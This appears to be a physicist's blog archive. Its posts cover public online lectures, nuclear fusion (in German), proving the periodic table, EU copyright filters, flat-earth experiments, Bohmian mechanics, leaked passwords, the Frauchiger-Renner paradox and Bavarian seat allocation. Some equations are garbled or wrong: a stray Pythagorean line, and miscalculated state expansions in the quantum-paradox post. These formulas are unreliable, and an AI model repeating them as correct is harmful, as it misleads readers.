Please comment: Should online teaching be public?

2020-04-10T14:19:00.001+02:00

I write this post because I am genuinely interested in people's opinions. So please comment even if usually you wouldn't and it's ok to to simply say you agree with somebody's opinion (or not). And of course you can do this anonymously or under a pseudonym.

The question is: What is the right balance between participants privacy and making things public in the name of public knowledge? Let me explain.

In these times where everybody has to stay at home and the summer semester is only one week away, everybody is busy planning how to run university teaching over the internet. And personally, I am quite optimistic. It's not the real thing but essentially all the tools are there and I see this as a chance to try out new things and experiment while everybody will tolerate if things are not perfect at least as long as you are honestly trying. Maybe this way, we can bring university to the 21st century. And yes, some things would work better if there had been more preparation and planning but without the current urgency, inertia might have kept many things from happening at all.

This summer, together with Sabine Jansen from the math department, I will once more teach the TMP core module "Mathematical Statistical Physics" as the physicist on the stage. At least in my interpretation, this course is mainly about how to honestly deal with systems with infinitely many degrees of freedom and understand the choices you have to make when handling them which then lead to phenomena like phase transitions, coexistence of phases and spontaneous symmetry breaking. I will mainly discuss the quantum part of the story using tools from the algebraic approach where the central objects are KMS states. I recorded a trailer video:

Regarding tools, I will pretty much do what Clifford suggested that is use Zoom for the lectures where I share the screen of my iPad while writing on it like a notepad and do pretty much what I would have done on a black board while talking and people can see my face. I plan to do this live so there can be questions and feedback and discussions both for the benefit of the participants asking questions and me trying not to talks completely over people's heads or boring everybody to death. In addition there will be a Moodle for handling exercise sheets, a forum and a chat as well as tutorials (also via zoom). And, and this is the point if this post: I want to record the zoom sessions of the lectures and make those available for later consumption.

And here is the point: I strongly believe in the principle that knowledge and information is that commodity that does not get smaller by sharing it. If everybody contributes a little bit this allows us as a community to build huge things. This idea is for example behind Open Source software and Wikipedia and has proven very successful in building many things from which everybody can benefit a lot.

In this spirit it is my impulse that of course the recored lectures should be available to everybody on the internet. And yes, I would love to see other peoples lectures as well, most of which will of course be much better then my own. I think this is particularly true for an advanced course like ours that is unlike the millionth electrodynamics course that every physics department in the world teaches every year. I hope, our content might be interesting to many people around the world and many of those would not have access to local lectures about it.

And yes, I am not super prepared for this course. I will make mistakes, say wrong things and make a fool of myself. But even then, I think it's worth it. Of course, I am in a privileged situation, I cannot see myself job hunting in the foreseeable future, I am very much settled. So my risk is mainly the everybody can see how stupid I am. But that's it. And to be honest, I rather expect if there is any effect at all it will be to my advantage because there is hope that one or two people might think we are teaching interesting stuff.

But there is a concern that this might not be the same for everybody. Remember, the idea of live teaching and not pre-recording everything is to allow for interactions with the audience. And the way zoom recordings work is that those reactions are recorded as well. Participants can chose other names and turn off their camera. But the question (clever or stupid) that anybody asks will be recorded never the less. And people might be concerned about this. And the fact that the whole world can later hear them asking what somebody might consider a stupid question might prevent them from asking the question at all. This all while my main worry should be the benefit of my own students rather than myself becoming an internet celebrity.

I would like to take into account that the benefit is not only about having my lectures available (that benefit is likely very very small). But what I am talking about is establishing a culture that over the long run makes many people's lectures available. And those are much more likely useful for many. While contemplating this in the example of my lectures I imagine that many lecturers might have similar thoughts at the same time (or I would like them to have those at least). This is along the idea that the idea I talked about in an old post that there is a possibility to take advantage of an asymmetric outcome in a prisoner's dilemma might be an illusion.

And what adds to it is that those people that would be hurt most by this are likely those how deserve the most support, timid ones, women, minorities.

So, what should I do? From what I have written you will get that I am very much in favour of sharing knowledge as much as possible. But I am willing to take concerns into account. But I want to take actual concerns into account and not those that one can simply imagine someone might have. So please tell me, what do you think? And yes, if you are the timid person, you might be less likely to leave a comment in a public blog. But please consider doing it never the less. Do it anonymously. It doesn't hurt. Of course, you can also email me. Also that can be done anonymously.

On Nuclear Fusion (in German)

2019-11-04T12:53:00.002+01:00

Florian Freistetter has posed the challenge in his blog to write a generally accessible text on why nuclear fusion works. Here is my attempt (according to the rules in German):

Gleich und gleich gesellt sich gern

Wassertropfen auf einer Oberfläche, Fettaugen in der Suppe, Bläschen in der Limo (oder im Körper eines Tauchers, siehe mein anderes Blog) und eben Atomkerne, diese Phänomene haben gemeinsam, dass die Oberflächenspannung eine entscheidende Rolle spielt.

Allen ist es gemeinsam, dass es eine Substanz (Wasser, Fett, Gas, Nukleonen - also Protonen und Neutronen, die Bestandteile des Atomkerns) gibt, die es am liebsten hat, wenn sie mit sich selbst umgeben ist und nicht mit der Umgebung (Luft, Suppe - hauptsächlich Wasser, Limo oder Vakuum). In all diesen Beispielen kann sich die Substanz besser arrangieren, wenn sie von ihresgleichen umgeben ist. Eine Grenzfläche hingegen kostet Energie, die Grenzflächenenergie.

In guter Näherung ist dieser Energiekosten proportional zur Fläche dieser Grenzfläche. Wenn es schon eine Grenzfläche geben muss, ist es am günstigsten, diese möglichst klein zu halten. Da die Substanzmenge und damit ihr Volumen jeweils unveränderlich ist, stellt sich eine runde Form (Kreisscheibe oder Kugel, je nach dem ob wir es mit etwas zweidimensionalem wie Fettaugen oder dreidimensionalen wie Bläschen zu tun haben) ein, die für eben dieses Volumen die kleinste Oberfläche hat (im zweidimensionalen Fall ist entsprechend die "Oberfläche" die Randlänge, während das "Volumen" der Flächeninhalt ist).

Was passiert aber, wenn zwei Tropfen, Fettaugen, Bläschen oder Atomkerne zusammenkommen? Wenn sie sich vereinigen, ist das vereinigte Volumen so groß wie die beiden Volumina vorher zusammen. Die Oberfläche ist jedoch kleiner als die Summe der Oberflächen vorher. Daher ist weniger Grenzflächenenergie nötig, der Rest an Energie wird frei. Bei der Suppe ist das so wenig, dass man es normalerweise eben nur daran merkt, dass sich die Fettaugen zu immer größeren vereinigen, beim Atomkern ist es aber so viel (einige Megaelektronenvolt pro Kern), dass man damit ein Fusionskraftwerk oder einen Stern betreiben kann.

Die freiwerdende Energie kommt also daher, dass weniger Nukleonen eine offene Flanke zum Vakuum haben, für sie ist es günstiger direkt nebeneinander zu liegen.

Soweit das qualitative Bild. Wir können es aber auch leicht quantitativ machen: Das Tröpfchen, das aus der Vereinigung zweier kleinerer entstanden ist, muss das doppelte Volumen der Ausgangströpfchen haben. Da aber das Volumen eines dreidimensionalen Körpers mit der dritten Potenz seines Durchmessers wächst, hat das große Tröpfchen nicht den doppelten Durchmesser der kleinen Tröpfchen, sondern ist nur um den Faktor $2^{1/3}$, also um die dritte Wurzel aus 2, etwa 1,26 größer.

Die Oberfläche wächst hingegen quadratisch mit dem Durchmesser, ist also um den Faktor $2^{2/3}$, also etwa 1,59 größer. Am Anfang hatten wir jedoch zwei Tröpfchen, also auch zweimal die Oberfläche, am Ende nur noch 1,59 mal die Oberfläche eines kleinen Tröpfchens. Wir haben also die Grenzflächenenergie im Umfang von 0,41 klein-Tröpfchenoberflächen gewonnen.

Daher werden sich mit der Zeit immer mehr Tröpfchen zu wenigen großen Tropfen vereinigen, da letztere weniger Oberfläche zur Luft in der Summe haben.

Genau das gleiche ist es bei Atomkernen. Auch diese verkleinern durch Zusammenkommen die Gesamtoberfläche zum Vakuum und bei dieser Vereinigung oder Fusion wird die entsprechende Oberflächenenergie frei.

Allerdings gibt es bei Atomkernen noch weitere energetische Beiträge, die vor allem bei großen Kernen mit vielen Nukleonen wichtig werden und dafür sorgen, dass zu große Kerne zwar eine kleinere Oberfläche als die Summe der möglichen Bruchstücke haben, aber trotzdem energetisch ungünstiger sind, so dass eine energetisch günstigste Kerngröße gibt (dies ist, wenn ich mich richtig an mein Studium erinnere, der Kern des Elements Eisen).

Da ist zunächst das "Pauli-Verbot", das verhindert, dass zwei Nukleonen in genau dem gleichen Zustand im Atomkern sind. Sie müssen sich in mindestens einem Aspekt unterscheiden. Dies kann zB ihr Drehimpuls (Spin) sein oder aber ihr "Isospin", also ob sie ein Proton oder ein Neutron sind. Wenn sie aber in all diesen Aspekten übereinstimmen, müssen sie wenigstens verschiedene Energieniveaus im Kern einnehmen. Kommen weitere Nukleonen hinzu, sind die untersten Energieniveaus schon besetzt und sie müssen ein höheres einnehmen (was eben diese Energie kostet).

Innerhalb des Kerns können sich aber Neutronen und Protonen und zurück ineinander umwandeln (dies ist der beta-Zerfall), kommt also etwa ein Neutron hinzu und müsste ein hohes Neutronen-Energieniveu besetzten, kann es sich, wenn ein günstigeres Protonen-Niveau noch frei ist, in ein Proton umwandeln (es sendet dazu ein Elektron und ein Antineutrino aus, damit auch mit der Ladung alles stimmt). Hier gibt es einen Energiebeitrag der jeweils einzeln von der Protonen- und der Neutronenzahl ist und teurer wird, je größer der Kern ist.

Ein weiterer Effekt ist, dass eben die Protonen elektrisch geladen ist und die anderen Protonen abstößt. Dies benötigt auch Energie in der Gesamtenergiebilanz eines Atomkerns, die proportional zum Quadrat der Protonenzahl ist (also ungünstig für zu große Kerne ist).

Wenn man all dies zusammenzählt, sieht man, dass man bei kleinen Kernen erstmal sehr viel Grenzflächen-Energie gewinnt, wenn man diese zu einem größeren vereinigt. Ab einer mittleren Kerngr öße fangen dann die anderen Effekte an zu überwiegen und zu große Kerne sind auch wieder nicht günstig, weswegen man auf durch Kernspaltung, also die Auftrennen solcher zu großen Kerne wieder Energie gewinnen kann.

Proving the Periodic Table

2019-03-29T12:02:00.000+01:00

The year 2019 is the International Year of the Periodic Table celebrating the 150th anniversary of Mendeleev's discovery. This prompts me to report on something that I learned in recent years when co-teaching "Mathematical Quantum Mechanics" with mathematicians in particular with Heinz Siedentop: We know less about the mathematics of the periodic table) than I thought.

In high school chemistry you learned that the periodic table comes about because of the orbitals in atoms. There is Hundt's rule that tells you the order in which you have to fill the shells in and in them the orbitals (s, p, d, f, ...). Then, in your second semester in university, you learn to derive those using Sehr\"odinger's equation: You diagonalise the Hamiltonian of the hyrdrogen atom and find the shells in terms of the main quantum number $n$ and the orbitals in terms of the angular momentum quantum number $L$ as $L=0$ corresponds to s, $L=1$ to p and so on. And you fill the orbitals thanks to the Pauli excursion principle. So, this proves the story of the chemists.

Except that it doesn't: This is only true for the hydrogen atom. But the Hamiltonian for an atom nuclear charge $Z$ and $N$ electrons (so we allow for ions) is (in convenient units)
$$ a^2+b^2=c^2$$

$$ H = -\sum_{i=1}^N \Delta_i -\sum_{i=1}^N \frac{Z}{|x_i|} + \sum_{i\lt j}^N\frac{1}{|x_i-x_j|}.$$

The story of the previous paragraph would be true if the last term, the Coulomb interaction between the electrons would not be there. In that case, there is no interaction between the electrons and we could solve a hydrogen type problem for each electron separately and then anti-symmetrise wave functions in the end in a Slater determinant to take into account their Fermionic nature. But of course, in the real world, the Coulomb interaction is there and it contributes like $N^2$ to the energy, so it is of the same order (for almost neutral atoms) like the $ZN$ of the electron-nucleon potential.

The approximation of dropping the electron-electron Coulomb interaction is well known in condensed matter systems where there resulting theory is known as a "Fermi gas". There it gives you band structure (which is then used to explain how a transistor works)

Band structure in a NPN-transistor

Also in that case, you pretend there is only one electron in the world that feels the periodic electric potential created by the nuclei and all the other electrons which don't show up anymore in the wave function but only as charge density.

For atoms you could try to make a similar story by taking the inner electrons into account by saying that the most important effect of the ee-Coulomb interaction is to shield the potential of the nucleus thereby making the effective $Z$ for the outer electrons smaller. This picture would of course be true if there were no correlations between the electrons and all the inner electrons are spherically symmetric in their distribution around the nucleus and much closer to the nucleus than the outer ones. But this sounds more like a day dream than a controlled approximation.

In the condensed matter situation, the standing for the Fermi gas is much better as there you could invoke renormalisation group arguments as the conductivities you are interested in are long wave length compared to the lattice structure, so we are in the infra red limit and the Coulomb interaction is indeed an irrelevant term in more than one euclidean dimension (and yes, in 1D, the Fermi gas is not the whole story, there is the Luttinger liquid as well).

But for atoms, I don't see how you would invoke such RG arguments.

So what can you do (with regards to actually proving the periodic table)? In our class, we teach how Lieb and Simons showed that in the $N=Z\to \infty$ limit (which in some sense can also be viewed as the semi-classical limit when you bring in $\hbar$ again) that the ground state energy $E^Q$ of the Hamiltonian above is in fact approximated by the ground state energy $E^{TF}$ of the Thomas-Fermi model (the simplest of all density functional theories, where instead of the multi-particle wave function you only use the one-particle electronic density $\rho(x)$ and approximate the kinetic energy by a term like $\int \rho^{5/3}$ which is exact for the three fermi gas in empty space):

$$E^Q(Z) = E^{TF}(Z) + O(Z^2)$$

where by a simple scaling argument $E^{TF}(Z) \sim Z^{7/3}$. More recently, people have computed more terms in these asymptotic which goes in terms of $Z^{-1/3}$, the second term ($O(Z^{6/3})= O(Z^2)$ is known and people have put a lot of effort into $O(Z^{5/3})$ but it should be clear that this technology is still very very far from proving anything "periodic" which would be $O(Z^0)$. So don't hold your breath hoping to find the periodic table from this approach.

On the other hand, chemistry of the periodic table (where the column is supposed to predict chemical properties of the atom expressed in terms of the orbitals of the "valence electrons") works best for small atoms. So, another sensible limit appears to be to keep $N$ small and fixed and only send $Z\to\infty$. Of course this is not really describing atoms but rather highly charged ions.

The advantage of this approach is that in the above Hamiltonian, you can absorb the $Z$ of the electron-nucleon interaction into a rescaling of $x$ which then let's $Z$ reappear in front of the electron-electron term as $1/Z$. Then in this limit, one can try to treat the ugly unwanted ee-term perturbatively.

Friesecke (from TUM) and collaborators have made impressive progress in this direction and in this limit they could confirm that for $N < 10$ the chemists' picture is actually correct (with some small corrections). There are very nice slides of a seminar talk by Friesecke on these results.

Of course, as a practitioner, this will not surprise you (after all, chemistry works) but it is nice to know that mathematicians can actually prove things in this direction. But it there is still some way to go even 150 years after Mendeleev.

Nebelkerze CDU-Vorschlag zu "keine Uploadfilter"

2019-03-16T10:43:00.000+01:00

Sorry, this one of the occasional posts about German politics and thus in German. This is my posting to a German speaking mailing lists discussing the upcoming EU copyright directive (must be stopped in current from!!! March 23rd international protest day) and now the CDU party has proposed how to implement it in German law, although so unspecific that all the problematic details are left out. Here is the post.

Vielleicht bin ich zu doof, aber ich verstehe nicht, wo der genaue Fortschritt zu dem, was auf EU-Ebene diskutiert wird, sein soll. Ausser dass der CDU-Vorschlag so unkonkret ist, dass alle internen Widersprüche im Nebel verschwinden. Auch auf EU-Ebene sagen doch die Befuerworter, dass man viel lieber Lizenzen erwerben soll, als filtern. Das an sich ist nicht neu.

Neu, zumindest in diesem Handelsblatt-Artikel, aber sonst habe ich das nirgends gefunden, ist die Erwähnung von Hashsummen („digitaler Fingerabdruck“) oder soll das eher sowas wie ein digitales Wasserzeichen sein? Das wäre eine echte Neuerung, würde das ganze Verfahren aber sofort im Keim ersticken, da damit nur die Originaldatei geschützt wäre (das waere ja auch trivial festzustellen), aber jede Form des abgeleiteten Werkes komplett durch die Maschen fallen würde und man durch eine Trivialänderung Werke „befreien“ könnte. Ansonsten sind wir wieder bei den zweifelhaften, auf heute noch nicht existierender KI-Technologie beruhenden Filtern.

Das andere ist die Pauschallizenz. Ich müsste also nicht mehr mit allen Urhebern Verträge abschliessen, sondern nur noch mit der VG Internet. Da ist aber wieder die grosse Preisfrage, für wen die gelten soll. Intendiert sind natürlich wieder Youtube, Google und FB. Aber wie formuliert man das? Das ist ja auch der zentrale Stein des Anstoßes der EU-Direktive: Eine Pauschallizenz brauchen all, ausser sie sind nichtkommerziell (wer ist das schon), oder (jünger als drei Jahre und mit wenigen Benutzern und kleinem Umsatz) oder man ist Wikipedia oder man ist GitHub? Das waere wieder die „Internet ist wie Fernsehen - mit wenigen grossen Sendern und so - nur eben anders“-Sichtweise, wie sie von Leuten, die das Internet aus der Ferne betrachten so gerne propagiert wird. Weil sie eben alles andere praktisch platt macht. Was ist denn eben mit den Foren oder Fotohostern? Müssten die alle eine Pauschallizenz erwerben (die eben so hoch sein müsste, dass sie alle Film- und Musikrechte der ganzen Welt pauschal abdeckt)? Was verhindert, dass das am Ende ein „wer einen Dienst im Internet betreibt, der muss eben eine kostenpflichtige Internetlizenz erwerben, bevor er online gehen kann“-Gesetz wird, das bei jeder nichttrivialen Höhe der Lizenzgebühr das Ende jeder gras roots Innovation waere?

Interessant waere natuerlich auch, wie die Einnahmen der VG Internet verteilt werden. Ein Schelm waere, wenn das nicht in großen Teilen zB bei Presseverlegern landen würde. Das waere doch dann endlich das „nehmt denjenigen, die im Internet Geld verdienen dieses weg und gebt es und, die nicht mehr so viel Geld verdienen“-Gesetz. Dann müsste die Lizenzgebühr am besten ein Prozentsatz des Umsatz sein, am besten also eine Internet-Steuer.

Und ich fange nicht damit an, wozu das führt, wenn alle europäischen Länder so krass ihre eigene Umsetzungssuppe kochen.

Alles in allem ein ziemlich gelungener Coup der CDU, der es schaffen kann, den Kritikern von Artikel 13 in der öffentlichen Meinung den Wind aus den Segeln zu nehmen, indem man es alles in eine inkonkrete Nebelwolke packt, wobei die ganzen problematischen Regelungen in den Details liegen dürften.

Challenge: How to talk to a flat earther?

2019-03-06T15:06:00.004+01:00

Further down the rabbit hole, over lunch I finished watching "Behind the Curve", a Netflix documentary on people believing the earth is a flat disk. According to them, the north pole is in the center, while Antarctica is an ice wall at the boundary. Sun and moon are much closer and flying above this disk while the stars are on some huge dome like in a planetarium. NASA is a fake agency promoting the doctrine and airlines must be part of the conspiracy as they know that you cannot directly fly between continents on the southern hemisphere (really?).

These people are happily using GPS for navigation but have a general mistrust in the science (and their teachers) of at least two centuries.

Besides the obvious "I don't see curvature of the horizon" they are even conducting experiments to prove their point (fighting with laser beams not being as parallel over miles of distance as they had hoped for). So at least some of them might be open to empirical disprove.

So here is my challenge: Which experiment would you conduct with them to convince them? Warning: Everything involving stuff disappearing at the horizon (ships sailing away, being able to see further from a tower) are complicated by non-trivial diffraction in the atmosphere which would very likely turn this observation inconclusive. The sun being at different declination (height) at different places might also be explained by being much closer and a Foucault pendulum might be too indirect to really convince them (plus it requires some non-elementary math to analyse).

My personal solution is to point to the observation that the declination of Polaris (around which I hope they can agree the night sky rotates) is given my the geographical latitude: At the north pole it is right above you but is has to go down the more south you get. I cannot see how this could be reconciled with a dome projection.

How would you approach this? The rules are that it must only involve observations available to everyone, no spaceflight, no extra high altitude planes. You are allowed to make use of the phone, cameras, you can travel (say by car or commercial flight but you cannot influence the flight route). It does not involve lots of money or higher math.

Bohmian Rapsody

2019-02-12T08:17:00.000+01:00

Visits to a Bohmian village

Over all of my physics life, I have been under the local influence of some Gaul villages that have ideas about physics that are not 100% aligned with the main stream views: When I was a student in Hamburg, I was good friends with people working on algebraic quantum field theory. Of course there were opinions that they were the only people seriously working on QFT as they were proving theorems while others dealt with perturbative series only that are known to diverge and are thus obviously worthless. Funnily enough they were literally sitting above the HERA tunnel where electron proton collisions took place that were very well described by exactly those divergent series. Still, I learned a lot from these people and would say there are few that have thought more deeply about structural properties of quantum physics. These days, I use more and more of these things in my own teaching (in particular in our Mathematical Quantum Mechanics and Mathematical Statistical Physics classes as well as when thinking about foundations, see below) and even some other physicists start using their language.

Later, as a PhD student at the Albert Einstein Institute in Potsdam, there was an accumulation point of people from the Loop Quantum Gravity community with Thomas Thiemann and Renate Loll having long term positions and many others frequently visiting. As you probably know, a bit later, I decided (together with Giuseppe Policastro) to look into this more deeply resulting in a series of papers there were well received at least amongst our peers and about which I am still a bit proud.

Now, I have been in Munich for over ten years. And here at the LMU math department there is a group calling themselves the Workgroup Mathematical Foundations of Physics. And let's be honest, I call them the Bohmians (and sometimes the Bohemians). And once more, most people believe that the Bohmian interpretation of quantum mechanics is just a fringe approach that is not worth wasting any time on. You will have already guessed it: I did so none the less. So here is a condensed report of what I learned and what I think should be the official opinion on this approach. This is an informal write up of a notes paper that I put on the arXiv today.

Bohmians don't like about the usual (termed Copenhagen lacking a better word) approach to quantum mechanics that you are not allowed to talk about so many things and that the observer plays such a prominent role by determining via a measurement what aspect is real an what is not. They think this is far too subjective. So rather, they want quantum mechanics to be about particles that then are allowed to follow trajectories.

"But we know this is impossible!" I hear you cry. So, let's see how this works. The key observation is that the Schrödinger equation for a Hamilton operator of the form kinetic term (possibly with magnetic field) plus potential term, has a conserved current

$$j = \bar\psi\nabla\psi - (\nabla\bar\psi)\psi.$$

So as your probability density is $\rho=\bar\psi\psi$, you can think of that being made up of particles moving with a velocity field

$$v = j/\rho = 2\Im(\nabla \psi/\psi).$$

What this buys you is that if you have a bunch of particles that is initially distributed like the probability density and follows the flow of the velocity field it will also later be distributed like $|\psi |^2$.

What is important is that they keep the Schrödinger equation in tact. So everything that you can do with the original Schrödinger equation (i.e. everything) can be done in the Bohmian approach as well. If you set up your Hamiltonian to describe a double slit experiment, the Bohmian particles will flow nicely to the screen and arrange themselves in interference fringes (as the probability density does). So you will never come to a situation where any experimental outcome will differ from what the Copenhagen prescription predicts.

The price you have to pay, however, is that you end up with a very non-local theory: The velocity field lives in configuration space, so the velocity of every particle depends on the position of all other particles in the universe. I would say, this is already a show stopper (given what we know about quantum field theory whose raison d'être is locality) but let's ignore this aesthetic concern.

What got me into this business was the attempt to understand how the set-ups like Bell's inequality and GHZ and the like work out that are supposed to show that quantum mechanics cannot be classical (technically that the state space cannot be described as local probability densities). The problem with those is that they are often phrased in terms of spin degrees of freedom which have Hamiltonians that are not directly of the form above. You can use a Stern-Gerlach-type apparatus to translate the spin degree of freedom to a positional but at the price of a Hamiltonian that is not explicitly know let alone for which you can analytically solve the Schrödinger equation. So you don't see much.

But from Reinhard Werner and collaborators I learned how to set up qubit-like algebras from positional observables of free particles (at different times, so get something non-commuting which you need to make use of entanglement as a specific quantum resource). So here is my favourite example:

You start with two particles each following a free time evolution but confined to an interval. You set those up in a particular entangled state (stationary as it is an eigenstate of the Hamiltonian) built from the two lowest levels of the particle in the box. And then you observe for each particle if it is in the left or the right half of the interval.

From symmetry considerations (details in my paper) you can see that each particle is with the same probability on the left and the right. But they are anti-correlated when measured at the same time. But when measured at different times, the correlation oscillates like the cosine of the time difference.

From the Bohmian perspective, for the static initial state, the velocity field vanishes everywhere, nothing moves. But in order to capture the time dependent correlations, as soon as one particle has been measured, the position of the second particle has to oscillate in the box (how the measurement works in detail is not specified in the Bohmian approach since it involves other degrees of freedom and remember, everything depends on everything but somehow it has to work since you want to produce the correlations that are predicted by the Copenhagen approach).

The trajectory of the second particle depending on its initial position

This is somehow the Bohmian version of the collapse of the wave function but they would never phrase it that way.

And here is where it becomes problematic: If you could see the Bohmian particle moving you could decide if the other particle has been measured (it would oscillate) or not (it would stand still). No matter where the other particle is located. With this observation you could build a telephone that transmits information instantaneously, something that should not exist. So you have to conclude you must not be able to look at the second particle and see if it oscillates or not.

Bohmians tell you you cannot because all you are supposed to observer about the particles are their positions (and not their velocity). And if you try to measure the velocity by measuring the position at two instants in time you don't because the first observation disturbs the particle so much that it invalidates the original state.

As it turns out, you are not allowed to observe anything else about the particles than that they are distributed like $|\psi |^2$ because if you could, you could build a similar telephone (at least statistically) as I explain the in the paper (this fact is known in the Bohm literature but I found it nowhere so clearly demonstrated as in this two particle system).

My conclusion is that the Bohm approach adds something (the particle positions) to the wave function but then in the end tells you you are not allowed to observe this or have any knowledge of this beyond what is already encoded in the wave function. It's like making up an invisible friend.

PS: If you haven't seen "Bohemian Rhapsody", yet, you should, even if there are good reasons to criticise the dramatisation of real events.

Has your password been leaked?

2019-01-17T20:43:00.002+01:00

Today, there was news about a huge database containing 773 million email address / password pairs became public. On Have I Been Pawned you can check if any of your email addresses is in this database (or any similar one). I bet it is (mine are).

These lists are very probably the source for the spam emails that have been around for a number of months where the spammer claims they broke into your account and tries to prove it by telling you your password. Hopefully, this is only a years old LinkedIn password that you have changed aeons ago.

To make sure, you actually want to search not for your email but for your password. But of course, you don't want to tell anybody your password. To this end, I have written a small perl script that checks for your password without telling anybody by doing a calculation locally on your computer. You can find it on GitHub.

Interfere and it didn't happen

2018-10-26T17:11:00.000+02:00

I am a bit late for the party, but also wanted to share my two cents on the paper "Quantum theory cannot consistently describe the use of itself" by Frauchiger and Renner. After sitting down and working out the math for myself, I found that the analysis in this paper and the blogpost by Scot (including many of the the 160+ comments, some by Renner) share a lot with what I am about to say but maybe I can still contribute a slight twist.

Coleman on GHZS

My background is the talk "Quantum Mechanics In Your Face" by Sidney Coleman which I consider as the best argument why quantum mechanics cannot be described by a local and realistic theory (from which I would conclude it is not realistic). In a nutshell, the argument goes like this: Consider the three qubit state state

$$\Psi=\frac 1{\sqrt 2}(\uparrow\uparrow\uparrow-\downarrow\downarrow\downarrow)$$

which is both an eigenstate of eigenvalue -1 for $\sigma_z\otimes\sigma_z\otimes\sigma_z$ and an eigenstate of eigenvalue +1 for $\sigma_x\otimes\sigma_x\otimes\sigma_z$ or any permutation. This means that, given that the individual outcomes of measuring a $\sigma$-matrix on a qubit is $\pm 1$, when measuring all in the z-direction there will be an odd number of -1 results but if two spins are measured in x-direction and one in z-direction there is an even number of -1's.

The latter tells us that the outcome of one z-measurement is the product of the two x-measurements on the other two spins. But multiplying this for all three spins we get that in shorthand $ZZZ=(XXX)^2=+1$ in contradiction to the -1 eigenvalue for all z-measurments.

The conclusion is (unless you assume some non-local conspiracy between the spins) that one has to take serious the fact that on a given spin I cannot measure both $\sigma_x$ and $\sigma_z$ and thus when actually measuring the latter I must not even assume that $X$ has some (although unknown) value $\pm 1$ as it leads to the contradiction. Stuff that I cannot measure does not have a value (that is also my understanding of what "not realistic" means).

Fruchtiger and Renner

Now to the recent Nature paper. In short, they are dealing with two qubits (by which I only mean two state systems). The first is in a box L' (I will try to use the somewhat unfortunate nomenclature from the paper) and the second in in a box L (L stands for lab). For L, we use the usual z-basis of $\uparrow$ and $\downarrow$ as well as the x-basis $\leftarrow = \frac 1{\sqrt 2}(\downarrow - \uparrow)$ and $\rightarrow = \frac 1{\sqrt 2}(\downarrow + \uparrow)$ . Similarly, for L' we use the basis $h$ and $t$ (heads and tails as it refers to a coin) as well as $o = \frac 1{\sqrt 2}(h - t)$ and $f = \frac 1{\sqrt 2}(h+f)$. The two qubits are prepared in the state

$$\Phi = \frac{h\otimes\downarrow + \sqrt 2 t\otimes \rightarrow}{\sqrt 3}$$.

Clearly, a measurement of $t$ in box L' implies that box L has to contain the state $\rightarrow$. Call this observation A.

Let's re-express $\rightarrow$ in the x-basis:

$$\Phi =\frac {h\otimes \downarrow + t\otimes \downarrow + t\otimes\uparrow}{\sqrt 3}$$

From which one concludes that an observer inside box L that measures $\uparrow$ concludes that the qubit in box L' is in state $t$. Call this observation B.

Similarly, we can express the same state in the x-basis for L':

$$\Phi = \frac{4 f\otimes \downarrow+ f\otimes \uparrow - o\otimes \uparrow}{\sqrt 3}$$

From this once can conclude that measuring $o$ for the state of L' one can conclude that L is in the state $\uparrow$. Call this observation C.

Using now C, B and A one is tempted to conclude that observing L' to be in state $o$ implies that L is in state $\rightarrow$. When we express the state in the $ht\leftarrow\rightarrow$-basis, however, we get

$$\Phi = \frac{f\otimes\leftarrow+ 3f\otimes \rightarrow + o\otimes\leftarrow - o\otimes \rightarrow}{\sqrt{12}}.$$

so with probability 1/12 we find both $o$ and $\leftarrow$. Again, we hit a contradiction.

One is tempted to use the same way out as above in the three qubit case and say one should not argue about contrafactual measurements that are incompatible with measurements that were actually performed. But Frauchiger and Renner found a set-up which seems to avoid that.

They have observers F and F' ("friends") inside the boxes that do the measurements in the $ht$ and $\uparrow\downarrow$ basis whereas later observers W and W' measure the state of the boxes including the observer F and F' in the $of$ and $\leftarrow\rightarrow$ basis. So, at each stage of A,B,C the corresponding measurement has actually taken place and is not contrafactual!

Interference and it did not happen

I believe the way out is to realise that at least from a retrospective perspective, this analysis stretches the language and in particular the word "measurement" to the extreme. In order for W' to measure the state of L' in the $of$-basis, he has to interfere the contents including F' coherently such that there is no leftover of information from F''s measurement of $ht$ remaining. Thus, when W''s measurement is performed one should not really say that F''s measurement has in any real sense happened as no possible information is left over. So it is in any practical sense contrafactual.

To see the alternative, consider a variant of the experiment where a tiny bit of information (maybe the position of one air molecule or the excitation of one of F''s neutrons) escapes the interference. Let's call the two possible states of that qubit of information $H$ and $T$ (not necessarily orthogonal) and consider instead the state where that neutron is also entangled with the first qubit:

$$\tilde \Phi = \frac{h\otimes\downarrow\otimes H + \sqrt 2 t\otimes \rightarrow\otimes T}{\sqrt 3}$$.

Then, the result of step C becomes

$$\tilde\Phi = \frac{f\otimes \downarrow\otimes H+ o\otimes \downarrow\otimes H+f\otimes \downarrow\otimes T-o\otimes\downarrow\otimes T + f\otimes \uparrow\otimes T-o \otimes\uparrow\times T}{\sqrt 6}.$$

We see that now there is a term containing $o\otimes\downarrow\otimes(H-T)$. Thus, as long as the two possible states of the air molecule/neuron are actually different, observation C is no longer valid and the whole contradiction goes away.

This makes it clear that the whole argument relies of the fact that when W' is doing his measurement any remnant of the measurement by his friend F' is eliminated and thus one should view the measurement of F' as if it never happened. Measuring L' in the $of$-basis really erases the measurement of F' in the complementary $ht$-basis.

Bavarian electoral system

2018-10-17T16:37:00.000+02:00

Last Sunday, we had the election for the federal state of Bavaria. Since the electoral system is kind of odd (but not as odd as first past the post), I would like to analyse how some variations (assuming the actual distribution of votes) in the rule would have worked out. So, first, here is how actually, the seats are distributed: Each voter gets two ballots: On the first ballot, each party lists one candidate from the local constituency and you can select one. On the second ballot, you can vote for a party list (it's even more complicated because also there, you can select individual candidates to determine the position on the list but let's ignore that for today).

Then in each constituency, the votes on ballot one are counted. The candidate with the most votes (like in first past the pole) gets elected for parliament directly (and is called a "direct candidate"). Then over all, the votes for each party on both ballots (this is where the system differs from the federal elections) are summed up. All votes for parties with less then 5% of the grand total of all votes are discarded (actually including their direct candidates but this is not of a partial concern). Let's call the rest the "reduced total". According to the fraction of each party in this reduced total the seats are distributed.

Of course the first problem is that you can only distribute seats in integer multiples of 1. This is solved using the Hare-Niemeyer-method: You first distribute the integer parts. This clearly leaves fewer seats open than the number of parties. Those you then give to the parties where the rounding error to the integer below was greatest. Check out the wikipedia page explaining how this can lead to a party losing seats when the total number of seats available is increased.

